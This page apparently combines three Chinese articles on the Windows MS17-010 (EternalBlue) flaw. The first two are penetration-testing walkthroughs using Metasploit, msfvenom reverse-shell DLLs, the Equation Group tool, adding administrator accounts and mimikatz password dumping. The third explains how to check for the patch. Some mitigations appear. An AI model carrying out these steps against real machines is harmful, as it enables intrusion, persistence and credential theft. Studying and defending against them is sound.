ms17010漏洞检测工具

⑴ 内网渗透之ms17-010

在内网渗透时，通常挂上代理后。在内网首先会打啵ms17-010。在实战中，使用msf的ms17-010模块，数次没有反弹成功。基于此，到底如何成功利用ms17-010

在msf成功接收session之后，添加路由

然后使用ms17-010相关的模块进行探测是否存在该漏洞。

尝试利用

LHOST配置为公网IP

可以看到success。漏洞是可以利用的，但始终没有session。不知道什么原因。
参考资料： 利用公网Msf+MS17010跨网段攻击内网
笔者在本地搭建环境，也是同样的结果。尝试更改payload为

bind_tcp攻击者去连接，容易被防火墙和杀毒发现
可以成功生成session，但并不稳定，且在run的过程中非常容易导致本来的session died

在实际使用msf的ms17_010_eternalblue模块时，笔者观察到有几个弊端。
1.session 很容易died
2.ms17_010_eternalblue模块利用起来非常耗时
3.无法利用成功
有大佬推荐使用原始的fb.py。但配置起来感觉麻烦一些。
所以。笔者从i春秋上找到一个轻便的方程式漏洞利用工具。
参考资料： 萌新初试MS17-010方程式漏洞
工具使用起来很简单。只需要msfvenom生成一个x64或x86的dll文件，替换该工具下的x64.dll或x86.dll 。再依次点击Eternalblue、Doublepulsar 的Attack即可。在Attack的时候，调用x64.dll动态链接库，反弹到公网IP。原理和fb.py一样。

笔者通过ew代理进内网后，在跳板机上上传了方程式漏洞利用工具、网安永恒之蓝检测工具。两者结合，威力巨大。成功利用ms17-010

对于windows server 2008 ，msfvenom生成x64.dll文件

msf配置

将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP，就可以获取session。

对于windows server 2003 ，msfvenom生成x86.dll文件

msf配置

进一步利用的一些命令

实际测试发现这种session非常稳定。不会轻易go die

实际测试server 2003的ms17-010时，有时候多次执行后msf就接收不到session，而且ms17-010利用时，脆弱的server 2003非常容易蓝屏。
所以笔者选择一种稳定可靠一些的办法。
先通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道[accessible named pipe]

参考资料 Metasploit 「永恒之蓝」两种模块的利弊

system的权限可以直接激活guest用户添加管理员组。

注意：使用ms17_010_psexec需要指定管理员的用户名、密码，否则没有session

同样的操作，载入mimikatz，读取管理员密码。

⑵ ms17010漏洞的简单利用

（第一次在发表文章，没啥经验，分享一些学习经验。大佬们多多包涵，也希望大家能够指出我的错误。）

靶机：windows7 x64  IP：192.168.1.5

攻击机：Kali Rolling (2019.3) x64 IP：192.168.1.3

两台主机在同一网段内；win7关闭防火墙并且开启445端口。

1、使用ipconfig/ifconfig分别查看win7和kali的ip。

2、打开msf工具

每次开启都会有不同的界面

3、使用search命令搜索ms17_010

4、选择模块和设置条件

使用use来选择第三个模块，可以直接 use 2，也可以打全

然后用set来设置靶机IP set rhost 192.168.1.5

设置本机IP set lhost 192.168.1.3

设置监听端口 set lport 8888 不设置则默认4444端口

设置payload set payload windows/x64/meterpreter/reverse_tcp

还有另外一个payload能用于本实验，具体可以 show payloads 查看

最后，可以使用show options检查所有信息

5、开始渗透 run

稍等片刻 看到win则成功创建会话

6、成功之后，可以开启Windows7的摄像头，截图等等

具体可以用help查看

1、关闭445端口

2、打开防火墙，安装安全软件

3、安装对应补丁，这里就不放链接了

关闭445端口的方法：

1）打开控制面板----Windows防火墙----高级设置

2）点击新建规则，设置端口号的规则并且命名（如图）

msf工具虽然强大，但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理，理解如何使用漏洞，甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。

⑶ 怎么看自己电脑是否安装 windows补丁 ms17010

检查电脑是否安装了针对MS17-010漏洞的补丁，可以借助一些安全软件来实现。比如，360安全卫士和电脑管家这类工具，在它们的漏洞修复功能中，可以查看本机安装漏洞的详细信息。通过这些工具，用户能够一目了然地了解系统当前的补丁状态。

具体操作步骤如下：首先，打开360安全卫士或电脑管家。然后，点击进入“漏洞修复”或“系统修复”模块。在这里，软件会自动检测系统漏洞并列出所有已安装的补丁。用户可以查看这些补丁的详细信息，包括补丁编号、适用范围以及安装日期等。如果发现有MS17-010漏洞相关的补丁，则说明系统已经得到了有效的防护。反之，如果没有该补丁，则需要及时安装以避免安全风险。

值得注意的是，不同版本的360安全卫士或电脑管家可能在界面布局和功能名称上有所不同。但总体来说，它们都提供了类似的漏洞检测和修复功能。因此，即使遇到不太熟悉的操作界面，也可以通过仔细阅读软件的帮助文档或在线搜索相关教程来解决。

此外，除了利用第三方软件进行检查，还可以参考微软官方发布的安全公告和补丁下载链接。例如，在微软的安全公告页面上，可以找到MS17-010漏洞的相关信息，包括受影响的产品列表、漏洞描述以及官方发布的补丁文件。用户可以根据这些信息判断自己的系统是否已经安装了相应的补丁。

总之，通过上述方法，用户可以方便地了解自己电脑是否安装了MS17-010漏洞的补丁。同时，定期进行系统更新和安全检查也是保护电脑免受恶意攻击的重要措施。